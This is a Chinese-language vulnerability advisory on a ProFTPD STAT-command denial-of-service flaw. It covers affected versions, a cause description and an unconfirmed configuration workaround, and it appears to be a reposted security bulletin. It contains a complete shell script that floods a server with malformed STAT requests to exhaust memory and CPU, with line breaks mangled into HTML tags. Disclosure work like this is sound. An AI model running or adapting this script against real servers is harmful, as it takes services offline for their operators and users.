ProFTPD STAT命令远程拒绝服务攻击漏洞

发布日期:2002-12-09
更新日期:2002-12-16

受影响系统:
ProFTPD Project ProFTPD 1.2.7 rc3
ProFTPD Project ProFTPD 1.2.7 rc2
ProFTPD Project ProFTPD 1.2.7 rc1
ProFTPD Project ProFTPD 1.2.6
ProFTPD Project ProFTPD 1.2.5
ProFTPD Project ProFTPD 1.2.4
ProFTPD Project ProFTPD 1.2.3
ProFTPD Project ProFTPD 1.2.2
ProFTPD Project ProFTPD 1.2.1
- Linux系统
- Unix系统
描述:


BUGTRAQID: 6341

ProFTPD是一款开放源代码FTP服务程序。

ProFTPD不正确处理畸形STAT命令,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击,使其停止响应。

攻击者如果向ProFTPD服务程序提交包含多个'/*'字符作为参数的STAT命令,会导致FTP服务崩溃,产生拒绝服务现象。

<*来源:b klein Gunnewiek ( [email protected]

链接: http://marc.theaimsgroup.com/?l=bugtraq&m=103963830009198&w=2
*>

测试方法:




警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
b klein Gunnewiek ( [email protected])提供了如下测试方法:

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach-www.duho.org
#
# use: ./prodos.sh <host><user><pass><br># do this some more to make sure the system eventually dies<br><br>cnt=25<br>while [ $cnt -gt 0 ] ; do<br>ftp -n &lt;&lt; EOF&amp;<br>o $1<br>quote user $2<br>quote pass $3<br>quote stat /*/*/*/*/*/*/*<br>quit<br>EOF<br>let cnt=cnt-1<br>done<br>sleep 2<br>killall -9 ftp<br>echo DONE!<br><br>#end<br><br><strong>建议:</strong> <br></pass></user></host>

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在'proftpd.conf'文件中增加如下一行:

DenyFilter \*.*/

不过没有得到证实。

厂商补丁:

ProFTPD Project
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.proftpd.org/

你可能感兴趣的:(linux,unix,软件测试,dos)